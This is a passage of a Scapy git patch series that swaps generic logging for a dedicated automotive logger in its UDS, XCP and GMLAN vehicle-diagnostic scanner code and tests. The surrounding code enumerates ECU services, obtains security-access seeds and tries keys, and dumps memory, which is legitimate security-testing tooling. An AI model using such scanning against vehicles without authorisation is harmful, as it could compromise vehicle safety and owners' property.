state) + # log_automotive.debug("[i] Using iterator %s in state %s", it, state) start_time = time.time() - log_interactive.debug( - "[i] Start execution of enumerator: %s", time.ctime(start_time)) + log_automotive.debug( + "Start execution of enumerator: %s", time.ctime(start_time)) for req in it: res = self.sr1_with_retry_on_error(req, socket, state, timeout) @@ -268,27 +269,27 @@ def execute(self, socket, state, **kwargs): self._store_result(state, req, res) if self._evaluate_response(state, req, res, **kwargs): - log_interactive.debug("[i] Stop test_case execution because " - "of response evaluation") + log_automotive.debug( + "Stop test_case execution because of response evaluation") return if count is not None: count -= 1 if count <= 0: - log_interactive.debug( - "[i] Finished execution count of enumerator") + log_automotive.debug( + "Finished execution count of enumerator") return if (start_time + execution_time) < time.time(): - log_interactive.debug( + log_automotive.debug( "[i] Finished execution time of enumerator: %s", time.ctime()) return - log_interactive.info("[i] Finished iterator execution") + log_automotive.info("Finished iterator execution") self._state_completed[state] = True - log_interactive.debug("[i] States completed %s", - repr(self._state_completed)) + log_automotive.debug("States completed %s", + repr(self._state_completed)) execute.__doc__ = _supported_kwargs_doc @@ -298,8 +299,8 @@ def sr1_with_retry_on_error(self, req, socket, state, timeout): res = socket.sr1(req, timeout=timeout, verbose=False, chainEX=True) except (OSError, ValueError, Scapy_Exception) as e: if not self._populate_retry(state, req): - log_interactive.critical( - "[-] Exception during retry. This is bad") + log_automotive.exception( + "Exception during retry. This is bad") raise e return res @@ -327,8 +328,8 @@ def _evaluate_response(self, """ if response is None: if cast(bool, kwargs.pop("retry_if_none_received", False)): - log_interactive.debug( - "[i] Retry %s because None received", repr(request)) + log_automotive.debug( + "Retry %s because None received", repr(request)) return self._populate_retry(state, request) return cast(bool, kwargs.pop("exit_if_no_answer_received", False)) @@ -354,8 +355,8 @@ def _evaluate_ecu_state_modifications(self, if EcuState.is_modifier_pkt(response): if state != EcuState.get_modified_ecu_state( response, request, state): - log_interactive.debug( - "[-] Exit execute. Ecu state was modified!") + log_automotive.debug( + "Exit execute. Ecu state was modified!") return True return False @@ -377,9 +378,9 @@ def _evaluate_negative_response_code(self, if response_code in [0x11, 0x7f]: names = {0x11: "serviceNotSupported", 0x7f: "serviceNotSupportedInActiveSession"} - msg = "[-] Exit execute because negative response " \ - "%s received!" % names[response_code] - log_interactive.debug(msg) + log_automotive.debug( + "Exit execute because negative response %s received!", + names[response_code]) # execute of current state is completed, # since a serviceNotSupported negative response was received self._state_completed[state] = True @@ -404,12 +405,12 @@ def _populate_retry(self, if self._retry_pkt[state] is None: # This was no retry since the retry_pkt is None self._retry_pkt[state] = request - log_interactive.debug( - "[-] Exit execute. Retry packet next time!") + log_automotive.debug( + "Exit execute. Retry packet next time!") return True else: # This was a unsuccessful retry, continue execute - log_interactive.debug("[-] Unsuccessful retry!") + log_automotive.debug("Unsuccessful retry!") return False def _evaluate_retry(self, @@ -423,8 +424,8 @@ def _evaluate_retry(self, if retry_if_busy_returncode and response.service == 0x7f \ and self._get_negative_response_code(response) == 0x21: - log_interactive.debug( - "[i] Retry %s because retry_if_busy_returncode received", + log_automotive.debug( + "Retry %s because retry_if_busy_returncode received", repr(request)) return self._populate_retry(state, request) return False @@ -505,11 +506,11 @@ def _prepare_negative_response_blacklist(self): for nrc, nr_count in nrc_dict.items(): if nrc not in self.negative_response_blacklist and \ nr_count > 30 and (nr_count / total_nr_count) > 0.3: - log_interactive.info("Added NRC 0x%02x to filter", nrc) + log_automotive.info("Added NRC 0x%02x to filter", nrc) self.negative_response_blacklist.append(nrc) if nrc in self.negative_response_blacklist and nr_count < 10: - log_interactive.info("Removed NRC 0x%02x to filter", nrc) + log_automotive.info("Removed NRC 0x%02x to filter", nrc) self.negative_response_blacklist.remove(nrc) @property @@ -604,7 +605,7 @@ def _show_negative_response_information(self, **kwargs): s += self._show_negative_response_details(**kwargs) or "" + "\n" if filtered and len(self.negative_response_blacklist): - s += "The following negative response codes are blacklisted: %s\n"\ + s += "The following negative response codes are blacklisted: %s\n" \ % [self._get_negative_response_desc(nr) for nr in self.negative_response_blacklist] @@ -745,8 +746,8 @@ def transition_function( res = sock.sr1(req, timeout=20, verbose=False, chainEX=True) return res is not None and res.service != 0x7f except (OSError, ValueError, Scapy_Exception) as e: - log_interactive.critical( - "[-] Exception in transition function: %s", e) + log_automotive.exception( + "Exception in transition function: %s", e) return False def get_transition_function_description(self, edge): diff --git a/scapy/contrib/automotive/scanner/executor.py b/scapy/contrib/automotive/scanner/executor.py index 0ceab0b9320..befdc88c08f 100644 --- a/scapy/contrib/automotive/scanner/executor.py +++ b/scapy/contrib/automotive/scanner/executor.py @@ -13,8 +13,9 @@ from scapy.compat import Any, Union, List, Optional, \ Dict, Callable, Type, cast +from scapy.contrib.automotive import log_automotive from scapy.contrib.automotive.scanner.graph import Graph -from scapy.error import Scapy_Exception, log_interactive +from scapy.error import Scapy_Exception from scapy.supersocket import SuperSocket from scapy.utils import make_lined_table, SingleConversationSocket import scapy.libs.six as six @@ -43,6 +44,7 @@ class AutomotiveTestCaseExecutor: :param kwargs: Arguments for the internal AutomotiveTestCaseExecutorConfiguration instance """ + @property def _initial_ecu_state(self): # type: () -> EcuState @@ -53,7 +55,8 @@ def __init__( socket, # type: _SocketUnion reset_handler=None, # type: Optional[Callable[[], None]] reconnect_handler=None, # type: Optional[Callable[[], _SocketUnion]] # noqa: E501 - test_cases=None, # type: Optional[List[Union[AutomotiveTestCaseABC, Type[AutomotiveTestCaseABC]]]] # noqa: E501 + test_cases=None, + # type: Optional[List[Union[AutomotiveTestCaseABC, Type[AutomotiveTestCaseABC]]]] # noqa: E501 **kwargs # type: Optional[Dict[str, Any]] ): # type: (...) -> None @@ -135,7 +138,7 @@ def scan_completed(self): def reset_target(self): # type: () -> None - log_interactive.info("[i] Target reset") + log_automotive.info("Target reset") if self.reset_handler: self.reset_handler() self.target_state = self._initial_ecu_state @@ -146,10 +149,10 @@ def reconnect(self): try: self.socket.close() except Exception as e: - log_interactive.debug( - "[i] Exception '%s' during socket.close", e) + log_automotive.exception( + "Exception '%s' during socket.close", e) - log_interactive.info("[i] Target reconnect") + log_automotive.info("Target reconnect") socket = self.reconnect_handler() if not isinstance(socket, SingleConversationSocket): self.socket = SingleConversationSocket(socket) @@ -188,8 +191,8 @@ def execute_test_case(self, test_case, kill_time=None): test_case_kwargs["execution_time"] = min(max_execution_time, cur_execution_time) - log_interactive.debug("[i] Execute test_case %s with args %s", - test_case.__class__.__name__, test_case_kwargs) + log_automotive.debug("Execute test_case %s with args %s", + test_case.__class__.__name__, test_case_kwargs) test_case.execute(self.socket, self.target_state, **test_case_kwargs) test_case.post_execute( @@ -203,7 +206,7 @@ def check_new_testcases(self, test_case): if isinstance(test_case, TestCaseGenerator): new_test_case = test_case.get_generated_test_case() if new_test_case: - log_interactive.debug("Testcase generated %s", new_test_case) + log_automotive.debug("Testcase generated %s", new_test_case) self.configuration.add_test_case(new_test_case) def check_new_states(self, test_case): @@ -211,7 +214,7 @@ def check_new_states(self, test_case): if isinstance(test_case, StateGenerator): edge = test_case.get_new_edge(self.socket, self.configuration) if edge: - log_interactive.debug("Edge found %s", edge) + log_automotive.debug("Edge found %s", edge) tf = test_case.get_transition_function(self.socket, edge) self.state_graph.add_edge(edge, tf) @@ -230,53 +233,53 @@ def scan(self, timeout=None): :return: None """ kill_time = time.time() + (timeout or 0xffffffff) - log_interactive.debug("[i] Set kill_time to %s" % time.ctime(kill_time)) + log_automotive.debug("Set kill_time to %s" % time.ctime(kill_time)) while kill_time > time.time(): test_case_executed = False - log_interactive.debug("[i] Scan paths %s", self.state_paths) + log_automotive.debug("Scan paths %s", self.state_paths) for p, test_case in product( self.state_paths, self.configuration.test_cases): - log_interactive.info("[i] Scan path %s", p) + log_automotive.info("Scan path %s", p) terminate = kill_time <= time.time() if terminate: - log_interactive.debug( - "[-] Execution time exceeded. Terminating scan!") + log_automotive.debug( + "Execution time exceeded. Terminating scan!") break final_state = p[-1] if test_case.has_completed(final_state): - log_interactive.debug("[+] State %s for %s completed", - repr(final_state), test_case) + log_automotive.debug("State %s for %s completed", + repr(final_state), test_case) continue try: if not self.enter_state_path(p): - log_interactive.error( - "[-] Error entering path %s", p) + log_automotive.error( + "Error entering path %s", p) continue - log_interactive.info( - "[i] Execute %s for path %s", str(test_case), p) + log_automotive.info( + "Execute %s for path %s", str(test_case), p) self.execute_test_case(test_case, kill_time) test_case_executed = True except (OSError, ValueError, Scapy_Exception) as e: - log_interactive.critical("[-] Exception: %s", e) + log_automotive.exception("Exception: %s", e) if self.configuration.debug: raise e if isinstance(e, OSError): - log_interactive.critical( - "[-] OSError occurred, closing socket") + log_automotive.exception( + "OSError occurred, closing socket") self.socket.close() if cast(SuperSocket, self.socket).closed and \ self.reconnect_handler is None: - log_interactive.critical( + log_automotive.critical( "Socket went down. Need to leave scan") raise e finally: self.cleanup_state() if not test_case_executed: - log_interactive.info( - "[i] Execute failure or scan completed. Exit scan!") + log_automotive.info( + "Execute failure or scan completed. Exit scan!") break self.cleanup_state() @@ -322,7 +325,7 @@ def enter_state(self, prev_state, next_state): funcs = self.state_graph.get_transition_tuple_for_edge(edge) if funcs is None: - log_interactive.error("[!] No transition function for %s", edge) + log_automotive.error("No transition function for %s", edge) return False trans_func, trans_kwargs, clean_func = funcs @@ -335,7 +338,7 @@ def enter_state(self, prev_state, next_state): self.cleanup_functions += [clean_func] return True else: - log_interactive.info("[-] Transition for edge %s failed", edge) + log_automotive.info("Transition for edge %s failed", edge) return False def cleanup_state(self): @@ -349,10 +352,10 @@ def cleanup_state(self): continue try: if not f(self.socket, self.configuration): - log_interactive.info( - "[-] Cleanup function %s failed", repr(f)) + log_automotive.info( + "Cleanup function %s failed", repr(f)) except (OSError, ValueError, Scapy_Exception) as e: - log_interactive.critical("[!] Exception during cleanup: %s", e) + log_automotive.critical("Exception during cleanup: %s", e) self.cleanup_functions = list() diff --git a/scapy/contrib/automotive/scanner/graph.py b/scapy/contrib/automotive/scanner/graph.py index 697fca6d9f1..16b40d00bed 100644 --- a/scapy/contrib/automotive/scanner/graph.py +++ b/scapy/contrib/automotive/scanner/graph.py @@ -9,8 +9,8 @@ from collections import defaultdict from scapy.compat import Union, List, Optional, Dict, Tuple, Set, TYPE_CHECKING +from scapy.contrib.automotive import log_automotive from scapy.contrib.automotive.ecu import EcuState -from scapy.error import log_interactive _Edge = Tuple[EcuState, EcuState] @@ -97,7 +97,7 @@ def render(self, filename="SystemStateGraph.gv", view=True): try: from graphviz import Digraph except ImportError: - log_interactive.info("Please install graphviz.") + log_automotive.info("Please install graphviz.") return ps = Digraph(name="SystemStateGraph", diff --git a/scapy/contrib/automotive/scanner/staged_test_case.py b/scapy/contrib/automotive/scanner/staged_test_case.py index b13535d8737..e6b6a4debd8 100644 --- a/scapy/contrib/automotive/scanner/staged_test_case.py +++ b/scapy/contrib/automotive/scanner/staged_test_case.py @@ -9,19 +9,17 @@ from scapy.compat import Any, List, Optional, Dict, Callable, cast, \ TYPE_CHECKING +from scapy.contrib.automotive import log_automotive from scapy.contrib.automotive.scanner.graph import _Edge -from scapy.error import log_interactive from scapy.contrib.automotive.ecu import EcuState, EcuResponse, Ecu from scapy.contrib.automotive.scanner.test_case import AutomotiveTestCaseABC, \ TestCaseGenerator, StateGenerator, _SocketUnion - if TYPE_CHECKING: from scapy.contrib.automotive.scanner.test_case import _TransitionTuple from scapy.contrib.automotive.scanner.configuration import \ AutomotiveTestCaseExecutorConfiguration - # type definitions _TestCaseConnectorCallable = \ Callable[[AutomotiveTestCaseABC, AutomotiveTestCaseABC], Dict[str, Any]] @@ -166,8 +164,8 @@ def has_completed(self, state): else: # We waited more iterations and no new state appeared, # let's enter the next stage - log_interactive.info( - "[+] Staged AutomotiveTestCase %s completed", + log_automotive.info( + "Staged AutomotiveTestCase %s completed", self.current_test_case.__class__.__name__) self.__stage_index += 1 self.__completion_delay = 0 @@ -195,9 +193,9 @@ def pre_execute(self, if self.__current_kwargs is not None and con_kwargs is not None: # noqa: E501 self.__current_kwargs.update(con_kwargs) - log_interactive.debug("[i] Stage AutomotiveTestCase %s kwargs: %s", - self.current_test_case.__class__.__name__, - self.__current_kwargs) + log_automotive.debug("Stage AutomotiveTestCase %s kwargs: %s", + self.current_test_case.__class__.__name__, + self.__current_kwargs) self.current_test_case.pre_execute(socket, state, global_configuration) diff --git a/scapy/contrib/automotive/uds.py b/scapy/contrib/automotive/uds.py index 4df8a505a3a..e42e79db2e2 100644 --- a/scapy/contrib/automotive/uds.py +++ b/scapy/contrib/automotive/uds.py @@ -9,6 +9,7 @@ import struct import time +from scapy.contrib.automotive import log_automotive from scapy.fields import ByteEnumField, StrField, ConditionalField, \ BitEnumField, BitField, XByteField, FieldListField, \ XShortField, X3BytesField, XIntField, ByteField, \ @@ -16,7 +17,7 @@ FieldLenField, XStrFixedLenField, XStrLenField from scapy.packet import Packet, bind_layers, NoPayload from scapy.config import conf -from scapy.error import log_loading, log_interactive, Scapy_Exception +from scapy.error import log_loading, Scapy_Exception from scapy.utils import PeriodicSenderThread from scapy.contrib.isotp import ISOTP from scapy.compat import Dict, Union @@ -1400,8 +1401,8 @@ def run(self): try: self._socket.sr1(p, timeout=0.3, verbose=False) except (OSError, ValueError, Scapy_Exception) as e: - log_interactive.critical( - "[!] Exception in TesterPresentSender: %s", e) + log_automotive.exception( + "Exception in TesterPresentSender: %s", e) break time.sleep(self._interval) if self._stopped.is_set() or self._socket.closed: diff --git a/scapy/contrib/automotive/uds_scan.py b/scapy/contrib/automotive/uds_scan.py index fffc52f8680..4dc552701ef 100644 --- a/scapy/contrib/automotive/uds_scan.py +++ b/scapy/contrib/automotive/uds_scan.py @@ -18,9 +18,10 @@ from scapy.compat import Dict, Optional, List, Type, Any, Iterable, \ cast, Union, NamedTuple, orb, Set +from scapy.contrib.automotive import log_automotive from scapy.packet import Raw, Packet import scapy.libs.six as six -from scapy.error import Scapy_Exception, log_interactive +from scapy.error import Scapy_Exception from scapy.contrib.automotive.uds import UDS, UDS_NR, UDS_DSC, UDS_TP, \ UDS_RDBI, UDS_WDBI, UDS_SA, UDS_RC, UDS_IOCBI, UDS_RMBA, UDS_ER, \ UDS_TesterPresentSender, UDS_CC, UDS_RDBPI, UDS_RD, UDS_TD @@ -31,7 +32,8 @@ StateGeneratingServiceEnumerator from scapy.contrib.automotive.scanner.test_case import AutomotiveTestCaseABC, \ _SocketUnion, _TransitionTuple, StateGenerator -from scapy.contrib.automotive.scanner.configuration import AutomotiveTestCaseExecutorConfiguration # noqa: E501 +from scapy.contrib.automotive.scanner.configuration import \ + AutomotiveTestCaseExecutorConfiguration # noqa: E501 from scapy.contrib.automotive.scanner.graph import _Edge from scapy.contrib.automotive.scanner.staged_test_case import StagedAutomotiveTestCase # noqa: E501 from scapy.contrib.automotive.scanner.executor import AutomotiveTestCaseExecutor # noqa: E501 @@ -43,6 +45,7 @@ from abc import ABC else: from abc import ABCMeta + ABC = ABCMeta('ABC', (), {}) # type: ignore # Definition outside the class UDS_RMBASequentialEnumerator @@ -143,7 +146,7 @@ def enter_state(socket, # type: _SocketUnion ans = socket.sr1(request, timeout=timeout, verbose=False) if ans is not None: if configuration.verbose: - log_interactive.debug( + log_automotive.debug( "Try to enter session req: %s, resp: %s" % (repr(request), repr(ans))) return cast(int, ans.service) != 0x7f @@ -222,7 +225,7 @@ def cleanup(_, configuration): configuration["tps"].stop() configuration["tps"] = None except (AttributeError, KeyError) as e: - log_interactive.debug("Cleanup TP-Sender Error: %s", e) + log_automotive.debug("Cleanup TP-Sender Error: %s", e) return True def get_transition_function(self, socket, edge): @@ -313,7 +316,7 @@ def _evaluate_response(self, **kwargs # type: Optional[Dict[str, Any]] ): # type: (...) -> bool if response and response.service == 0x51: - log_interactive.warning( + log_automotive.warning( "ECUResetPositiveResponse detected! This might have changed " "the state of the ECU under test.") @@ -484,10 +487,10 @@ def _get_initial_requests(self, **kwargs): rdbi_enumerator = kwargs.pop("rdbi_enumerator", None) if rdbi_enumerator is None: - log_interactive.debug("[i] Use entire scan range") + log_automotive.debug("Use entire scan range") return (UDS() / UDS_WDBI(dataIdentifier=x) for x in scan_range) elif isinstance(rdbi_enumerator, UDS_RDBIEnumerator): - log_interactive.debug("[i] Selective scan based on RDBI results") + log_automotive.debug("Selective scan based on RDBI results") return (UDS() / UDS_WDBI(dataIdentifier=t.resp.dataIdentifier) / Raw(load=bytes(t.resp)[3:]) for t in rdbi_enumerator.results_with_positive_response @@ -561,8 +564,8 @@ def _evaluate_retry(self, if response.service == 0x7f and \ self._get_negative_response_code(response) in [0x24, 0x37]: - log_interactive.debug( - "[i] Retry %s because requiredTimeDelayNotExpired or " + log_automotive.debug( + "Retry %s because requiredTimeDelayNotExpired or " "requestSequenceError received", repr(request)) return super(UDS_SAEnumerator, self)._populate_retry( @@ -582,7 +585,7 @@ def _evaluate_response(self, if response is not None and \ response.service == 0x67 and \ response.securityAccessType % 2 == 1: - log_interactive.debug("[i] Seed received. Leave scan to try a key") + log_automotive.debug("Seed received. Leave scan to try a key") return True return False @@ -597,12 +600,12 @@ def get_seed_pkt(sock, level=1, record=b""): return None elif seed.service == 0x7f and \ UDS_Enumerator._get_negative_response_code(seed) != 0x37: - log_interactive.info( + log_automotive.info( "Security access no seed! NR: %s", repr(seed)) return None elif seed.service == 0x7f and seed.negativeResponseCode == 0x37: - log_interactive.info("Security access retry to get seed") + log_automotive.info("Security access retry to get seed") time.sleep(10) continue else: @@ -613,13 +616,13 @@ def get_seed_pkt(sock, level=1, record=b""): def evaluate_security_access_response(res, seed, key): # type: (Optional[Packet], Packet, Optional[Packet]) -> bool if res is None or res.service == 0x7f: - log_interactive.info(repr(seed)) - log_interactive.info(repr(key)) - log_interactive.info(repr(res)) - log_interactive.info("Security access error!") + log_automotive.info(repr(seed)) + log_automotive.info(repr(key)) + log_automotive.info(repr(res)) + log_automotive.info("Security access error!") return False else: - log_interactive.info("Security access granted!") + log_automotive.info("Security access granted!") return True @@ -664,7 +667,7 @@ def key_function_short(s): def get_security_access(self, sock, level=1, seed_pkt=None): # type: (_SocketUnion, int, Optional[Packet]) -> bool - log_interactive.info( + log_automotive.info( "Try bootloader security access for level %d" % level) if seed_pkt is None: seed_pkt = self.get_seed_pkt(sock, level) @@ -681,17 +684,17 @@ def get_security_access(self, sock, level=1, seed_pkt=None): try: res = sock.sr1(key_pkt, timeout=5, verbose=False) if sock.closed: - log_interactive.critical("[-] Socket closed during scan.") + log_automotive.critical("Socket closed during scan.") raise Scapy_Exception("Socket closed during scan") except (OSError, ValueError, Scapy_Exception) as e: try: last_seed_req = self._results[-1].req last_state = self._results[-1].state if not self._populate_retry(last_state, last_seed_req): - log_interactive.critical( - "[-] Exception during retry. This is bad") + log_automotive.exception( + "Exception during retry. This is bad") except IndexError: - log_interactive.warning("[-] Couldn't populate retry.") + log_automotive.warning("Couldn't populate retry.") raise e return self.evaluate_security_access_response( @@ -724,7 +727,7 @@ def get_new_edge(self, socket, config): sec_lvl = seed.securityAccessType if self.get_security_access(socket, sec_lvl, seed): - log_interactive.debug("Security Access found.") + log_automotive.debug("Security Access found.") # create edge new_state = copy.copy(last_state) new_state.security_level = seed.securityAccessType + 1 # type: ignore # noqa: E501 @@ -742,8 +745,7 @@ def get_new_edge(self, socket, config): def get_transition_function(self, socket, edge): # type: (_SocketUnion, _Edge) -> Optional[_TransitionTuple] return self.transition_function, \ - self._transition_function_args[edge], \ - None + self._transition_function_args[edge], None class UDS_RCEnumerator(UDS_Enumerator): @@ -966,7 +968,8 @@ def execute(self, socket, state, **kwargs): def __init__(self): # type: () -> None super(UDS_RMBASequentialEnumerator, self).__init__() - self.__points_of_interest = defaultdict(list) # type: Dict[EcuState, List[_PointOfInterest]] # noqa: E501 + self.__points_of_interest = defaultdict( + list) # type: Dict[EcuState, List[_PointOfInterest]] # noqa: E501 self.__initial_points_of_interest = None # type: Optional[List[_PointOfInterest]] # noqa: E501 def _get_memory_addresses_from_results(self, results): @@ -1086,7 +1089,7 @@ def show(self, dump=False, filtered=True, verbose=False): ih.tofile("RMBA_dump.hex", format="hex") except ImportError: err_msg = "Install 'intelhex' to create a hex file of the memory" - log_interactive.critical(err_msg) + log_automotive.exception(err_msg) with open("RMBA_dump.hex", "w") as file: file.write(err_msg) @@ -1214,6 +1217,7 @@ class UDS_Scanner(AutomotiveTestCaseExecutor): >>> s.show_testcases_status() >>> s.show_testcases() """ + @property def default_test_case_clss(self): # type: () -> List[Type[AutomotiveTestCaseABC]] diff --git a/scapy/contrib/automotive/xcp/scanner.py b/scapy/contrib/automotive/xcp/scanner.py index c1d57721c75..d2968783b62 100644 --- a/scapy/contrib/automotive/xcp/scanner.py +++ b/scapy/contrib/automotive/xcp/scanner.py @@ -5,11 +5,12 @@ # scapy.contrib.description = XCPScanner # scapy.contrib.status = loads - +import logging from collections import namedtuple from scapy.compat import Optional, List, Type, Iterator from scapy.config import conf +from scapy.contrib.automotive import log_automotive from scapy.contrib.automotive.xcp.cto_commands_master import \ TransportLayerCmd, TransportLayerCmdGetSlaveId, Connect from scapy.contrib.automotive.xcp.cto_commands_slave import \ @@ -41,12 +42,13 @@ def __init__(self, can_socket, id_range=None, self.__socket = can_socket self.id_range = id_range or range(0, 0x800) self.__sniff_time = sniff_time - self.__verbose = verbose + if verbose: + log_automotive.setLevel(logging.DEBUG) def _scan(self, identifier, body, pid, answer_type): # type: (int, CTORequest, int, Type) -> List # noqa: E501 - self.log_verbose("Scan for id: " + str(identifier)) + log_automotive.info("Scan for id: " + str(identifier)) flags = 'extended' if identifier >= 0x800 else 0 cto_request = \ XCPOnCAN(identifier=identifier, flags=flags) \ @@ -54,10 +56,10 @@ def _scan(self, identifier, body, pid, answer_type): req_and_res_list, _unanswered = \ self.__socket.sr(cto_request, timeout=self.__sniff_time, - verbose=self.__verbose, multi=True) + verbose=False, multi=True) if len(req_and_res_list) == 0: - self.log_verbose( + log_automotive.info( "No answer for identifier: " + str(identifier)) return [] @@ -80,12 +82,12 @@ def _send_connect(self, identifier): result = XCPScannerResult(response_id=req_and_res[1].identifier, request_id=identifier) all_slaves.append(result) - self.log_verbose( + log_automotive.info( "Detected XCP slave for broadcast identifier: " + str( identifier) + "\nResponse: " + str(result)) if len(all_slaves) == 0: - self.log_verbose( + log_automotive.info( "No XCP slave detected for identifier: " + str(identifier)) return all_slaves @@ -117,7 +119,7 @@ def _send_get_slave_id(self, identifier): result = XCPScannerResult(request_id=request_id, response_id=response.identifier) all_slaves.append(result) - self.log_verbose( + log_automotive.info( "Detected XCP slave for broadcast identifier: " + str( identifier) + "\nResponse: " + str(result)) @@ -127,7 +129,7 @@ def scan_with_get_slave_id(self): # type: () -> List[XCPScannerResult] """Starts the scan for XCP devices on CAN with the transport specific GetSlaveId Message""" - self.log_verbose("Start scan with GetSlaveId id in range: " + str( + log_automotive.info("Start scan with GetSlaveId id in range: " + str( self.id_range)) for identifier in self.id_range: @@ -139,7 +141,7 @@ def scan_with_get_slave_id(self): def scan_with_connect(self): # type: () -> List[XCPScannerResult] - self.log_verbose("Start scan with CONNECT id in range: " + str( + log_automotive.info("Start scan with CONNECT id in range: " + str( self.id_range)) results = [] for identifier in self.id_range: @@ -147,7 +149,3 @@ def scan_with_connect(self): if len(result) > 0: results.extend(result) return results - - def log_verbose(self, output): - if self.__verbose: - print(output) diff --git a/test/contrib/automotive/gm/gmlanutils.uts b/test/contrib/automotive/gm/gmlanutils.uts index 72144dd37f0..7a49273788a 100644 --- a/test/contrib/automotive/gm/gmlanutils.uts +++ b/test/contrib/automotive/gm/gmlanutils.uts @@ -6,7 +6,9 @@ = Imports +from scapy.contrib.automotive import log_automotive from test.testsocket import TestSocket, cleanup_testsockets +import logging ############ ############ @@ -18,6 +20,8 @@ load_layer("can", globals_dict=globals()) load_contrib("automotive.gm.gmlan", globals_dict=globals()) load_contrib("automotive.gm.gmlanutils", globals_dict=globals()) +log_automotive.setLevel(logging.DEBUG) + = Define test sockets isotpsock2 = TestSocket(GMLAN) @@ -761,11 +765,12 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_InitDiagnostics(isotpsock, timeout=0.1, verbose=1, unittest=True) == True +res = GMLAN_InitDiagnostics(isotpsock, timeout=0.1, unittest=True) == True thread.join(timeout=5) assert res assert ecusimSuccessfullyExecuted == True + = sequence of the correct messages, disablenormalcommunication as broadcast ecusimSuccessfullyExecuted = True started = threading.Event() @@ -803,7 +808,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_InitDiagnostics(isotpsock, broadcast_socket=GMLAN_BroadcastSocket(broadcastsender), timeout=5, verbose=1, unittest=True) == True +res = GMLAN_InitDiagnostics(isotpsock, broadcast_socket=GMLAN_BroadcastSocket(broadcastsender), timeout=5, unittest=True) == True thread.join(timeout=5) assert res assert ecusimSuccessfullyExecuted == True @@ -826,7 +831,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_InitDiagnostics(isotpsock, timeout=0.1, verbose=1, unittest=True) == False +res = GMLAN_InitDiagnostics(isotpsock, timeout=0.1, unittest=True) == False thread.join(timeout=5) assert res assert ecusimSuccessfullyExecuted == True @@ -856,7 +861,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_InitDiagnostics(isotpsock, timeout=0.1, verbose=1, unittest=True) == False +res = GMLAN_InitDiagnostics(isotpsock, timeout=0.1, unittest=True) == False thread.join(timeout=5) assert res assert ecusimSuccessfullyExecuted == True @@ -890,7 +895,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_InitDiagnostics(isotpsock, timeout=0.1, verbose=1, unittest=True) == False +res = GMLAN_InitDiagnostics(isotpsock, timeout=0.1, unittest=True) == False thread.join(timeout=5) assert res assert ecusimSuccessfullyExecuted == True @@ -915,7 +920,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_InitDiagnostics(isotpsock, timeout=0.1, verbose=1, unittest=True) == False +res = GMLAN_InitDiagnostics(isotpsock, timeout=0.1, unittest=True) == False thread.join(timeout=5) assert res assert ecusimSuccessfullyExecuted == True @@ -940,7 +945,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=0, unittest=True) == True +res = GMLAN_InitDiagnostics(isotpsock, timeout=1, retry=0, unittest=True) == True assert res thread.join(timeout=5) @@ -961,7 +966,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_InitDiagnostics(isotpsock, timeout=0.1, verbose=1, retry=0, unittest=True) == False +res = GMLAN_InitDiagnostics(isotpsock, timeout=0.1, retry=0, unittest=True) == False thread.join(timeout=5) assert res assert ecusimSuccessfullyExecuted == True @@ -988,7 +993,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_InitDiagnostics(isotpsock, timeout=0.1, verbose=1, retry=1, unittest=True) == True +res = GMLAN_InitDiagnostics(isotpsock, timeout=0.1, retry=1, unittest=True) == True thread.join(timeout=5) assert res @@ -1017,7 +1022,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=1, unittest=True) == True +res = GMLAN_InitDiagnostics(isotpsock, timeout=1, retry=1, unittest=True) == True thread.join(timeout=5) assert res @@ -1050,7 +1055,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=1, unittest=True) == True +res = GMLAN_InitDiagnostics(isotpsock, timeout=1, retry=1, unittest=True) == True thread.join(timeout=5) assert res @@ -1072,7 +1077,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_InitDiagnostics(isotpsock, timeout=0.1, verbose=1, retry=1, unittest=True) == False +res = GMLAN_InitDiagnostics(isotpsock, timeout=0.1, retry=1, unittest=True) == False thread.join(timeout=5) assert res assert ecusimSuccessfullyExecuted == True From 5fa225dd8f4fbb671b4e4404bf921310486e4814 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 27 Jul 2022 08:48:15 +0200 Subject: [PATCH 0863/1632] Add ISOTP logger --- scapy/contrib/isotp/__init__.py | 4 +- scapy/contrib/isotp/isotp_scanner.py | 54 ++++++++++-------------- scapy/contrib/isotp/isotp_soft_socket.py | 13 +++--- scapy/contrib/isotp/isotp_utils.py | 4 ++ test/contrib/isotpscan.uts | 6 ++- 5 files changed, 40 insertions(+), 41 deletions(-) diff --git a/scapy/contrib/isotp/__init__.py b/scapy/contrib/isotp/__init__.py index 7e2ce8e108f..d1c11ecac6a 100644 --- a/scapy/contrib/isotp/__init__.py +++ b/scapy/contrib/isotp/__init__.py @@ -14,14 +14,14 @@ from 